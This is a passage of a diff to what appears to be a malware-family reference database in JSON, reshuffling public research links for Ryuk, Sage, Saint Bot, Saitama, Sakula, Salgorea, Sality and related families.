+ "https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/", + "https://www.domaintools.com/resources/blog/analyzing-network-infrastructure-as-composite-objects", + "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/", + "https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/", + 
"https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/4217-ccn-cert-id-26-19-ryuk-1/file.html", + "https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP", + "https://www.secureworks.com/research/threat-profiles/gold-ulrick", + "https://www.advanced-intel.com/post/adversary-dossier-ryuk-ransomware-anatomy-of-an-attack-in-2021", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", "https://www.hhs.gov/sites/default/files/bazarloader.pdf", + "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", + "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/", + "https://thehackernews.com/2022/05/malware-analysis-trickbot.html", + "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", + "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022", + "https://4rchib4ld.github.io/blog/NiceToMeetYouRyuk/", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", "https://twitter.com/SophosLabs/status/1321844306970251265", + "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", + "https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/", + "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/", + "https://0xchina.medium.com/malware-reverse-engineering-31039450af27", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + 
"https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.advanced-intel.com/post/crime-laundering-primer-inside-ryuk-crime-crypto-ledger-risky-asian-crypto-traders", + "https://twitter.com/IntelAdvanced/status/1353546534676258816", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://twitter.com/ffforward/status/1324281530026524672", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/", + "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://unit42.paloaltonetworks.com/ryuk-ransomware/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://www.scythe.io/library/threatthursday-ryuk", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", + "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", + "https://blogs.microsoft.com/on-the-issues/2022/04/13/zloader-botnet-disrupted-malware-ukraine/", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://www.clearskysec.com/wp-content/uploads/2021/02/Conti-Ransomware.pdf", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-likely-behind-new-orleans-cyberattack/", + "https://thedfirreport.com/2020/10/08/ryuks-return/", + 
"https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-deployed-two-weeks-after-trickbot-infection/", + "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", + "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-stops-encrypting-linux-folders/", + "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://community.riskiq.com/article/c88cf7e6", + "https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html", + "https://blogs.quickheal.com/deep-dive-wakeup-lan-wol-implementation-ryuk/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/", + "https://news.sophos.com/en-us/2021/05/06/mtr-in-real-time-pirates-pave-way-for-ryuk-ransomware/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + 
"https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf", + "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", + "https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc", + "https://twitter.com/IntelAdvanced/status/1356114606780002308", + "https://twitter.com/anthomsec/status/1321865315513520128", + "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://labs.sentinelone.com/an-inside-look-at-how-ryuk-evolved-its-encryption-and-evasion-techniques/", - "https://www.scythe.io/library/threatthursday-ryuk", - "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/", + 
"https://edition.cnn.com/2020/10/28/politics/hospitals-targeted-ransomware-attacks/index.html", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-ACT-005.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption", + "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html", + "https://blog.cyberint.com/ryuk-crypto-ransomware", "https://www.youtube.com/watch?v=Of_KjNG9DHc", - "https://community.riskiq.com/article/c88cf7e6", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", - "https://www.bleepingcomputer.com/news/security/french-it-giant-sopra-steria-hit-by-ryuk-ransomware/", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://blogs.microsoft.com/on-the-issues/2020/10/12/trickbot-ransomware-cyberthreat-us-elections/", - "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike", - "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", - "https://blog.virustotal.com/2020/10/tracing-fresh-ryuk-campaigns-itw.html", - "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", - "https://news.sophos.com/en-us/2021/05/06/mtr-in-real-time-pirates-pave-way-for-ryuk-ransomware/", - "https://twitter.com/IntelAdvanced/status/1353546534676258816", - "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", - "https://www.secureworks.com/research/threat-profiles/gold-ulrick", - "https://arcticwolf.com/resources/blog/karakurt-web", - 
"https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider",
- "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
- "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html",
- "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-ryuk-ransomware-targeting-webservers.pdf",
- "https://www.crowdstrike.com/blog/wizard-spider-adversary-update/",
- "https://www.youtube.com/watch?v=HwfRxjV2wok",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://sites.temple.edu/care/ci-rw-attacks/",
 "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
 "https://www.youtube.com/watch?v=BhjQ6zsCVSc",
- "https://storage.pardot.com/652283/16118467480sqebwq7/MSP_Security_Summit___John_Hammond_Huntress___Analyzing_Ryuk.pdf",
- "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://threatconnect.com/blog/threatconnect-research-roundup-ryuk-and-domains-spoofing-eset-and-microsoft/",
- "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html",
- 
"https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456",
- "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/",
- "https://ia.acs.org.au/article/2019/hospital-cyberattack-could-have-been-avoided.html",
- "https://0xchina.medium.com/malware-reverse-engineering-31039450af27",
- "https://research.nccgroup.com/2021/03/04/deception-engineering-exploring-the-use-of-windows-service-canaries-against-ransomware/",
- "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
- "https://areteir.com/wp-content/uploads/2020/08/Arete_Insight_Is-Conti-the-new-Ryuk_August2020.pdf",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://thedfirreport.com/2020/10/08/ryuks-return/",
- "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
- "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
- "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
- "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
- "https://community.riskiq.com/article/0bcefe76",
- "https://twitter.com/Prosegur/status/1199732264386596864",
- 
"https://twitter.com/anthomsec/status/1321865315513520128",
- "https://www.advanced-intel.com/post/adversary-dossier-ryuk-ransomware-anatomy-of-an-attack-in-2021",
- "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html",
- "https://blog.cyberint.com/ryuk-crypto-ransomware",
- "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/CORP_KNOWLEDGEBASE/91000/KB91844/en_US/McAfee%20Labs%20Threat%20Advisory%20-%20Ransom-Ryukv6.pdf",
- "https://www.youtube.com/watch?v=CgDtm05qApE",
+ "https://arcticwolf.com/resources/blog/karakurt-web",
 "https://blog.emsisoft.com/en/35023/bug-in-latest-ryuk-decryptor-may-cause-data-loss/",
- "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
- "https://www.splunk.com/en_us/blog/security/ryuk-and-splunk-detections.html",
- "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12",
 "https://www.carbonblack.com/blog/vmware-carbon-black-tau-ryuk-ransomware-technical-analysis/",
- "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption",
- "https://twitter.com/ffforward/status/1324281530026524672",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
- "https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/",
- 
"https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
- "https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-ii-the-office/",
- "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
- "https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.youtube.com/watch?v=7xxRunBP5XA",
- "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
- "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
- "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
- "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/",
- "https://n1ght-w0lf.github.io/malware%20analysis/ryuk-ransomware/",
- "https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker",
- "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware",
- "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
- "https://0xc0decafe.com/2020/12/28/never-upload-ransomware-samples-to-the-internet/",
- "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
- "https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/",
- "https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://www.bleepingcomputer.com/news/security/steelcase-furniture-giant-hit-by-ryuk-ransomware-attack/",
 "https://twitter.com/SecurityJoes/status/1402603695578157057",
- 
"https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/5768-ccn-cert-id-03-21-ryuk-ransomware/file.html",
- "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
- "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos/4217-ccn-cert-id-26-19-ryuk-1/file.html",
- "https://decrypt.co/15394/how-ransomware-exploded-in-the-age-of-btc",
- "https://fourcore.io/blogs/ryuk-ransomware-simulation-mitre-ttp",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-NicolaoMartins.pdf",
- "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://www.advanced-intel.com/post/crime-laundering-primer-inside-ryuk-crime-crypto-ledger-risky-asian-crypto-traders",
- "https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/",
- "https://twitter.com/IntelAdvanced/status/1356114606780002308",
- "https://www.bleepingcomputer.com/news/security/new-ryuk-info-stealer-targets-government-and-military-secrets/",
- "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
- "https://4rchib4ld.github.io/blog/NiceToMeetYouRyuk/",
- "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://krebsonsecurity.com/2020/10/fbi-dhs-hhs-warn-of-imminent-credible-ransomware-threat-against-u-s-hospitals/",
- "https://www.zdnet.com/article/dod-contractor-suffers-ransomware-infection/",
+ "https://www.mandiant.com/resources/fin12-ransomware-intrusion-actor-pursuing-healthcare-targets",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ 
"https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider",
+ "https://www.crowdstrike.com/blog/wizard-spider-adds-new-feature-to-ryuk-ransomware/",
+ "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/",
+ "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
+ "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
 "https://blog.reversinglabs.com/blog/hunting-for-ransomware",
- "https://blog.talosintelligence.com/2020/06/CTIR-trends-q3-2020.html#more",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.reuters.com/article/usa-healthcare-cyber-idUSKBN27E0EP",
- "https://blog.malwarebytes.com/threat-spotlight/2019/12/threat-spotlight-the-curious-case-of-ryuk-ransomware/",
- "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-deployed-two-weeks-after-trickbot-infection/",
- "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-stops-encrypting-linux-folders/",
- "https://threatconnect.com/blog/threatconnect-research-roundup-possible-ryuk-infrastructure/",
- "https://cofense.com/the-ryuk-threat-why-bazarbackdoor-matters-most/"
+ "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/",
+ "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf",
+ "https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456",
+ "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
+ "https://securityliterate.com/reversing-ryuk-a-technical-analysis-of-ryuk-ransomware/",
+ 
"https://threatconnect.com/blog/threatconnect-research-roundup-ryuk-and-domains-spoofing-eset-and-microsoft/",
+ "https://www.bleepingcomputer.com/news/security/hacking-group-is-targeting-us-hospitals-with-ryuk-ransomware/",
+ "https://docs.microsoft.com/en-us/security/compass/human-operated-ransomware",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf"
 ],
 "synonyms": [],
 "type": []
@@ -42602,10 +44618,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer",
+ "https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/",
 "https://analyst1.com/file-assets/Nationstate_ransomware_with_consecutive_endnotes.pdf",
- "https://twitter.com/VK_Intel/status/1171782155581689858",
 "https://www.crowdstrike.com/blog/sidoh-wizard-spiders-mysterious-exfiltration-tool/",
- "https://www.bleepingcomputer.com/news/security/ryuk-related-malware-steals-confidential-military-financial-files/"
+ "https://twitter.com/VK_Intel/status/1171782155581689858"
 ],
 "synonyms": [
 "Sidoh"
@@ -42672,11 +44688,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom",
- "https://www.cert.pl/en/news/single/sage-2-0-analysis/",
+ "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga",
 "http://malware-traffic-analysis.net/2017/10/13/index.html",
- "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/",
+ "https://www.cert.pl/en/news/single/sage-2-0-analysis/",
 "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/",
- "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga"
+ "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/"
 ],
 "synonyms": [
 "Saga"
@@ -42705,13 +44721,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.saint_bot",
- "https://www.cyberscoop.com/ukrainian-cyber-attacks-russia-conflict-q-and-a/",
 "https://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/",
- "https://unit42.paloaltonetworks.com/atoms/nascentursa/",
+ "https://www.cyberscoop.com/ukrainian-cyber-attacks-russia-conflict-q-and-a/",
 "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview",
+ "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/",
 "https://blog.malwarebytes.com/threat-analysis/2021/04/a-deep-dive-into-saint-bot-downloader/",
 "https://cert.gov.ua/article/18419",
- "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/"
+ "https://unit42.paloaltonetworks.com/atoms/nascentursa/"
 ],
 "synonyms": [],
 "type": []
@@ -42724,11 +44740,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.saitama",
- "https://x-junior.github.io/malware%20analysis/2022/06/24/Apt34.html",
- "https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html",
- "https://isc.sans.edu/diary/Translating+Saitama%27s+DNS+tunneling+messages/28738",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/",
 "https://www.fortinet.com/blog/threat-research/please-confirm-you-received-our-apt",
- "https://blog.malwarebytes.com/threat-intelligence/2022/05/apt34-targets-jordan-government-using-new-saitama-backdoor/"
+ "https://x-junior.github.io/malware%20analysis/2022/06/24/Apt34.html",
+ "https://isc.sans.edu/diary/Translating+Saitama%27s+DNS+tunneling+messages/28738",
+ "https://www.trendmicro.com/en_us/research/23/b/new-apt34-malware-targets-the-middle-east.html"
 ],
 "synonyms": [
 "AMATIAS",
@@ -42744,15 +44760,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat",
- "https://web.archive.org/web/20151001235506/https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=654",
- "https://www.secureworks.com/research/sakula-malware-family",
- "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
- "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula",
- "https://docs.broadcom.com/doc/the-black-vine-cyberespionage-group",
 "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/black-vine-cyberespionage-group-15-en.pdf",
- "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99",
+ "https://web.archive.org/web/20151001235506/https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=654",
+ "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1",
 "https://cyberthreatintelligenceblog.wordpress.com/2018/11/16/c0ld-case-from-aerospace-to-chinas-interests/",
- "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1"
+ "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf",
+ "https://docs.broadcom.com/doc/the-black-vine-cyberespionage-group",
+ "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula",
+ "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99",
+ "https://www.secureworks.com/research/sakula-malware-family"
 ],
 "synonyms": [
 "Sakurel"
@@ -42767,9 +44783,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea",
- "https://research.checkpoint.com/deobfuscating-apt32-flow-graphs-with-cutter-and-radare2/",
+ "https://www.accenture.com/us-en/blogs/blogs-pond-loach-delivers-badcake-malware",
 "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf",
- "https://www.accenture.com/us-en/blogs/blogs-pond-loach-delivers-badcake-malware"
+ "https://research.checkpoint.com/deobfuscating-apt32-flow-graphs-with-cutter-and-radare2/"
 ],
 "synonyms": [
 "BadCake"
@@ -42784,15 +44800,15 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality",
- "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://unit42.paloaltonetworks.com/c2-traffic/",
- "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
 "https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.mandiant.com/resources/pe-file-infecting-malware-ot",
+ "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf",
+ "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf",
 "https://gist.githubusercontent.com/quangnh89/41deada8a936a1877a6c6c757ce73800/raw/41f27388a11a606e1d6a7596dcb6469578e79321/sality_extractor.py",
+ "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
 "https://www.dragos.com/blog/the-trojan-horse-malware-password-cracking-ecosystem-targeting-industrial-operators/",
- "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf"
